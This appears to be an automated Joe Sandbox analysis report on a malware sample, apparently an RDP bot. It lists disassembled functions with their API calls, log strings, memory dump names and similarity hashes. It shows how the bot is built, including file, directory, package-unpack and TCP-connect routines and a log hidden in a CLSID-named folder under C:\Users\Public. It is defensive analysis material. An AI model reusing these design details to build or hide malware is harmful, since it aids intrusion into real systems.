Function 00007FF70CAD4D2B Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 133fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 00007FF70CAD4D53
fclose.MSVCRT ref: 00007FF70CAD4D85
_errno.MSVCRT ref: 00007FF70CAD4E3F
_errno.MSVCRT ref: 00007FF70CAD4E60
fwrite.MSVCRT ref: 00007FF70CAD4ED4

Strings

[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d), xrefs: 00007FF70CAD4F04
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF70CAD4DF2, 00007FF70CAD4E22
(mode != NULL), xrefs: 00007FF70CAD4E14
fs_file_write, xrefs: 00007FF70CAD4DB5, 00007FF70CAD4DEB, 00007FF70CAD4E1B, 00007FF70CAD4E4D, 00007FF70CAD4EFD, 00007FF70CAD4FAD
[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu), xrefs: 00007FF70CAD4FB4
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF70CAD4DDD, 00007FF70CAD4E0D
[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d), xrefs: 00007FF70CAD4E54
NULL, xrefs: 00007FF70CAD4F8A, 00007FF70CAD4F96
[E] (%s) -> Failed(path=%s,mode=%s,err=%08x), xrefs: 00007FF70CAD4DBC
(path != NULL), xrefs: 00007FF70CAD4DE4

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: _errno$fclosefopenfwrite
String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
API String ID: 608220805-544371937
Opcode ID: 9fce181ec319a978e2150695fd8a354e269b163736cb1d300ed70b9f1ac958d1
Instruction ID: b45b6ac1487b2bc9b1102e515b6ad654f00b3790bb8be8d6e9769ead675054f2
Opcode Fuzzy Hash: 9fce181ec319a978e2150695fd8a354e269b163736cb1d300ed70b9f1ac958d1
Instruction Fuzzy Hash: A1519FE1A0865391FA10BB54FD40EF8A261BF58798FC84532DA4E47699EF3CE946C360

Function 00007FFDA55D5E9E Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFDA55D5EBD
CreateDirectoryA.KERNEL32 ref: 00007FFDA55D5EDF
GetLastError.KERNEL32 ref: 00007FFDA55D5F30
strcpy.MSVCRT ref: 00007FFDA55D5F81
strlen.MSVCRT ref: 00007FFDA55D5F89
strlen.MSVCRT ref: 00007FFDA55D5FA5
strlen.MSVCRT ref: 00007FFDA55D5FB6
CreateDirectoryA.KERNEL32 ref: 00007FFDA55D6027
GetLastError.KERNEL32 ref: 00007FFDA55D6031

Strings

C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFDA55D5F00
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu), xrefs: 00007FFDA55D5FE0
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FFDA55D5F49
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FFDA55D6106
fs_dir_create, xrefs: 00007FFDA55D5F0E, 00007FFDA55D5F42, 00007FFDA55D5FD9, 00007FFDA55D60FF, 00007FFDA55D6166
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55D5F15
(path != NULL), xrefs: 00007FFDA55D5F07
NULL, xrefs: 00007FFDA55D6157
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FFDA55D616D

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: strlen$CreateDirectoryErrorLast$strcpy
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
API String ID: 1104438493-1059260517
Opcode ID: fdd1620f7f6c7dc95a89a780df97f5cd85b76bc442082f963a1d3c779d2f4203
Instruction ID: d8572bc34b31ffde26c81070c33290318c24bb7eab8065ace0b93477a866a43c
Opcode Fuzzy Hash: fdd1620f7f6c7dc95a89a780df97f5cd85b76bc442082f963a1d3c779d2f4203
Instruction Fuzzy Hash: 3F716E5BB0E28BC2FF22DF14E4A03B95251AF5AF84F541132D90E467D7DE2DE84A8709

Function 00007FFDAC12328E Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFDAC1232AD
CreateDirectoryA.KERNEL32 ref: 00007FFDAC1232CF
GetLastError.KERNEL32 ref: 00007FFDAC123320
strcpy.MSVCRT ref: 00007FFDAC123371
strlen.MSVCRT ref: 00007FFDAC123379
strlen.MSVCRT ref: 00007FFDAC123395
strlen.MSVCRT ref: 00007FFDAC1233A6
CreateDirectoryA.KERNEL32 ref: 00007FFDAC123417
GetLastError.KERNEL32 ref: 00007FFDAC123421

Strings

[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FFDAC123339
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FFDAC1234F6
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FFDAC12355D
fs_dir_create, xrefs: 00007FFDAC1232FE, 00007FFDAC123332, 00007FFDAC1233C9, 00007FFDAC1234EF, 00007FFDAC123556
NULL, xrefs: 00007FFDAC123547
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFDAC1232F0
(path != NULL), xrefs: 00007FFDAC1232F7
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu), xrefs: 00007FFDAC1233D0
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDAC123305

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: strlen$CreateDirectoryErrorLast$strcpy
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
API String ID: 1104438493-1059260517
Opcode ID: 37466eeaf5d3145fe9945981e2911f8d504b80a502f3577bf6a39c079ccfc115
Instruction ID: 2e68f719bac5013c4e0f0ad227d0f45d2d442dec217b144b2f5267e35503e62c
Opcode Fuzzy Hash: 37466eeaf5d3145fe9945981e2911f8d504b80a502f3577bf6a39c079ccfc115
Instruction Fuzzy Hash: B071801BB0E68385FB635B19E4743B91299AF44BF8F940032D94E47397EE3CE945831A

Function 00007FF70CAD309C Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF70CAD30BC
GetLastError.KERNEL32 ref: 00007FF70CAD31ED

Part of subcall function 00007FF70CAD1FD0: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF70CAD162F), ref: 00007FF70CAD1FEE

strlen.MSVCRT ref: 00007FF70CAD310E
strlen.MSVCRT ref: 00007FF70CAD312A
_mbscat.MSVCRT ref: 00007FF70CAD3145
strlen.MSVCRT ref: 00007FF70CAD314D
strlen.MSVCRT ref: 00007FF70CAD3162
fopen.MSVCRT ref: 00007FF70CAD3185

Strings

Done, xrefs: 00007FF70CAD332A
main.log, xrefs: 00007FF70CAD316A
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FF70CAD31FF
debug_init, xrefs: 00007FF70CAD31AB, 00007FF70CAD31D0, 00007FF70CAD31F8, 00007FF70CAD32BD, 00007FF70CAD3331
service, xrefs: 00007FF70CAD309E
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FF70CAD31B2
[E] (%s) -> Failed(err=%08x), xrefs: 00007FF70CAD31D7
[I] (%s) -> %s, xrefs: 00007FF70CAD3338
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FF70CAD32C4
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log, xrefs: 00007FF70CAD30EE, 00007FF70CAD3104, 00007FF70CAD313B, 00007FF70CAD3158, 00007FF70CAD31A4

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpin_mbscatfopen
String ID: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$main.log$service
API String ID: 3216678114-1460613360
Opcode ID: 96bd7c6eba04a360beb0778c3ff0aeb107e1236561809f6db92a680622f1bfc4
Instruction ID: 04d6dfa5c56b53a8a2845019aefc66a89720da8f2b73dc2fc3fb8a8cbef50e5b
Opcode Fuzzy Hash: 96bd7c6eba04a360beb0778c3ff0aeb107e1236561809f6db92a680622f1bfc4
Instruction Fuzzy Hash: CC510AD0E0D60792FE207754BC80BB8D670AF14748FD44532D50F462EADF6DA986D3A2

Function 00007FF70CAD7750 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 193stringCOMMON

Download Yara Rule

APIs

_mbscat.MSVCRT ref: 00007FF70CAD78D0
strlen.MSVCRT ref: 00007FF70CAD798E
_mbscpy.MSVCRT ref: 00007FF70CAD79B6
_mbscpy.MSVCRT ref: 00007FF70CAD7A0D
strlen.MSVCRT ref: 00007FF70CAD7A15
strlen.MSVCRT ref: 00007FF70CAD7A3F

Part of subcall function 00007FF70CAD4FC5: fopen.MSVCRT ref: 00007FF70CAD500A
Part of subcall function 00007FF70CAD4FC5: fseek.MSVCRT ref: 00007FF70CAD5029
Part of subcall function 00007FF70CAD4FC5: _errno.MSVCRT ref: 00007FF70CAD503D
Part of subcall function 00007FF70CAD4FC5: _errno.MSVCRT ref: 00007FF70CAD5058

Strings

C:/Projects/rdp/bot/codebase/package.c, xrefs: 00007FF70CAD77FA, 00007FF70CAD782A
[E] (%s) -> Entry unpack failed(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u,err=%08x), xrefs: 00007FF70CAD7920
[I] (%s) -> Done(package=%s,target=%s), xrefs: 00007FF70CAD7A8D
%TEMP%, xrefs: 00007FF70CAD78B2
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF70CAD780F, 00007FF70CAD783F
package_unpack, xrefs: 00007FF70CAD77C9, 00007FF70CAD7808, 00007FF70CAD7838, 00007FF70CAD7919, 00007FF70CAD7A60, 00007FF70CAD7A86
(target != NULL), xrefs: 00007FF70CAD7831
(package != NULL), xrefs: 00007FF70CAD7801
[I] (%s) -> Entry unpack done(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u), xrefs: 00007FF70CAD7A67
[E] (%s) -> Failed(package=%s,target=%s,err=%08x), xrefs: 00007FF70CAD77D0
NULL, xrefs: 00007FF70CAD7A9E, 00007FF70CAD7AAA

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: strlen$_errno_mbscpy$_mbscatfopenfseek
String ID: %TEMP%$(package != NULL)$(target != NULL)$C:/Projects/rdp/bot/codebase/package.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Entry unpack failed(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u,err=%08x)$[E] (%s) -> Failed(package=%s,target=%s,err=%08x)$[I] (%s) -> Done(package=%s,target=%s)$[I] (%s) -> Entry unpack done(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u)$package_unpack
API String ID: 3066828623-21863935
Opcode ID: 7ba6229d510545bc1099f335a41e03444cc33afe3a15cc7e5bdd05c7c464b084
Instruction ID: 6b8f8475342ee9f67bb3413c62203b90dcfe6460de8d8dfa2e920a1ae2224ccc
Opcode Fuzzy Hash: 7ba6229d510545bc1099f335a41e03444cc33afe3a15cc7e5bdd05c7c464b084
Instruction Fuzzy Hash: AC818FA1A0864791FA14AB14FC90BF9A760FF44788FC44132EA4E8769DDF7CE909C760

Function 00007FF70CAD16E3 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 179stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70CAD1FD0: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF70CAD162F), ref: 00007FF70CAD1FEE

strlen.MSVCRT ref: 00007FF70CAD1758
strlen.MSVCRT ref: 00007FF70CAD177A
_mbscpy.MSVCRT ref: 00007FF70CAD1796
strlen.MSVCRT ref: 00007FF70CAD179E
strlen.MSVCRT ref: 00007FF70CAD17B5
FreeLibrary.KERNEL32 ref: 00007FF70CAD17F1
GetProcessHeap.KERNEL32 ref: 00007FF70CAD18AD
HeapAlloc.KERNEL32 ref: 00007FF70CAD18C1
_mbscpy.MSVCRT ref: 00007FF70CAD18D6

Strings

unit_init, xrefs: 00007FF70CAD185F
units_init, xrefs: 00007FF70CAD189A, 00007FF70CAD1967, 00007FF70CAD19A8
[I] (%s) -> Done(name=%s), xrefs: 00007FF70CAD19AF
[E] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FF70CAD196E
mem_alloc, xrefs: 00007FF70CAD1908
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF70CAD190F
[I] (%s) -> Loaded(f_path=%s), xrefs: 00007FF70CAD18A1
unit_cleanup, xrefs: 00007FF70CAD1876

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: strlen$Heap_mbscpy$AllocFreeHandleLibraryModuleProcess
String ID: [E] (%s) -> Failed(name=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(name=%s)$[I] (%s) -> Loaded(f_path=%s)$mem_alloc$unit_cleanup$unit_init$units_init
API String ID: 548194777-214984806
Opcode ID: 6f04a3ac30b96920190a4090dd1e2e38484ea8572020f9663c02a833a678134c
Instruction ID: 0f7d0b5c25569007352f94680dd376f0f8b1d9e8557b903b6c5c0e174d295aa1
Opcode Fuzzy Hash: 6f04a3ac30b96920190a4090dd1e2e38484ea8572020f9663c02a833a678134c
Instruction Fuzzy Hash: 21816EA5A0864381FA61BB55FC50BBAE3A1AF44798FC44031DA4F07799EF7CE906C760

Function 00007FF70CAD685F Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 199fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000021B15D113D0,?,00007FF70CAE8500,00007FF70CAD1669), ref: 00007FF70CAD68B7
LockFileEx.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000021B15D113D0,?,00007FF70CAE8500,00007FF70CAD1669), ref: 00007FF70CAD68F0
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000021B15D113D0,?,00007FF70CAE8500,00007FF70CAD1669), ref: 00007FF70CAD69C5
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000021B15D113D0,?,00007FF70CAE8500,00007FF70CAD1669), ref: 00007FF70CAD6AAA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000021B15D113D0,?,00007FF70CAE8500,00007FF70CAD1669), ref: 00007FF70CAD6C1E

Strings

[E] (%s) -> CreateFileA failed(path=%s,gle=%lu), xrefs: 00007FF70CAD69DA
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF70CAD697F, 00007FF70CAD69AF
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD694B
(lock != NULL), xrefs: 00007FF70CAD69A1
service, xrefs: 00007FF70CAD6862
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF70CAD696A, 00007FF70CAD699A
[E] (%s) -> LockFileEx failed(path=%s,gle=%lu), xrefs: 00007FF70CAD6ABF
fs_file_lock, xrefs: 00007FF70CAD6944, 00007FF70CAD6978, 00007FF70CAD69A8, 00007FF70CAD69D3, 00007FF70CAD6AB8, 00007FF70CAD6C3B
NULL, xrefs: 00007FF70CAD6C29
[I] (%s) -> Done(path=%s,lock=%p), xrefs: 00007FF70CAD6C42
(path != NULL), xrefs: 00007FF70CAD6971

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleLock
String ID: (lock != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$service
API String ID: 2747014929-2960251455
Opcode ID: 8fc40516025b69d713b2c35ef962e398e0df903b16a14ab3aaeabe9612dbb93f
Instruction ID: 5f86aa43def5e6cf0f6315d3cde146602b136201a333f9d3d0e2ef2c4c5a389b
Opcode Fuzzy Hash: 8fc40516025b69d713b2c35ef962e398e0df903b16a14ab3aaeabe9612dbb93f
Instruction Fuzzy Hash: 5E813FE0E4C74B81FB30B794BC40BBCB2509F10358ED44632E96F066D9EF6DA9859362

Function 00007FFDA55AB00C Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFDA55AB030
htonl.WS2_32 ref: 00007FFDA55AB0CC
htons.WS2_32 ref: 00007FFDA55AB0DD
connect.WS2_32 ref: 00007FFDA55AB0F6
WSAGetLastError.WS2_32 ref: 00007FFDA55AB11C
select.WS2_32 ref: 00007FFDA55AB18C
WSAGetLastError.WS2_32 ref: 00007FFDA55AB19C
WSAGetLastError.WS2_32 ref: 00007FFDA55AB1DE

Part of subcall function 00007FFDA55AACA9: ioctlsocket.WS2_32 ref: 00007FFDA55AACCF

Part of subcall function 00007FFDA55AABF4: setsockopt.WS2_32 ref: 00007FFDA55AAC1C
Part of subcall function 00007FFDA55AABF4: setsockopt.WS2_32 ref: 00007FFDA55AAC48

WSAGetLastError.WS2_32 ref: 00007FFDA55AB20B

Strings

[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFDA55AB1CD
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFDA55AB094
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFDA55AB223
[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFDA55AB1FA
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFDA55AB24D
tcp_connect, xrefs: 00007FFDA55AB08D, 00007FFDA55AB1A8, 00007FFDA55AB1C6, 00007FFDA55AB1F3, 00007FFDA55AB21C, 00007FFDA55AB246
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFDA55AB1AF

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: 0a4862cfda780c714fe174f871a044bfed7ed8bd71ba60d4e37772747565a8be
Instruction ID: 228fd1e2095d23d4075e9549f22650258e6e08271a86d80f284768dbc6c1beba
Opcode Fuzzy Hash: 0a4862cfda780c714fe174f871a044bfed7ed8bd71ba60d4e37772747565a8be
Instruction Fuzzy Hash: 9D51E429B0EA4E42EA224F15E8283797650BF43F70F440735EA2D467E7EE7EE4458348

Function 00007FFDA55D20FC Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFDA55D2120
htonl.WS2_32 ref: 00007FFDA55D21BC
htons.WS2_32 ref: 00007FFDA55D21CD
connect.WS2_32 ref: 00007FFDA55D21E6
WSAGetLastError.WS2_32 ref: 00007FFDA55D220C
select.WS2_32 ref: 00007FFDA55D227C
WSAGetLastError.WS2_32 ref: 00007FFDA55D228C
WSAGetLastError.WS2_32 ref: 00007FFDA55D22CE

Part of subcall function 00007FFDA55D1D99: ioctlsocket.WS2_32 ref: 00007FFDA55D1DBF

Part of subcall function 00007FFDA55D1CE4: setsockopt.WS2_32 ref: 00007FFDA55D1D0C
Part of subcall function 00007FFDA55D1CE4: setsockopt.WS2_32 ref: 00007FFDA55D1D38

WSAGetLastError.WS2_32 ref: 00007FFDA55D22FB

Strings

[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFDA55D233D
[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFDA55D22BD
tcp_connect, xrefs: 00007FFDA55D217D, 00007FFDA55D2298, 00007FFDA55D22B6, 00007FFDA55D22E3, 00007FFDA55D230C, 00007FFDA55D2336
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFDA55D2313
[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFDA55D22EA
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFDA55D2184
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFDA55D229F

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
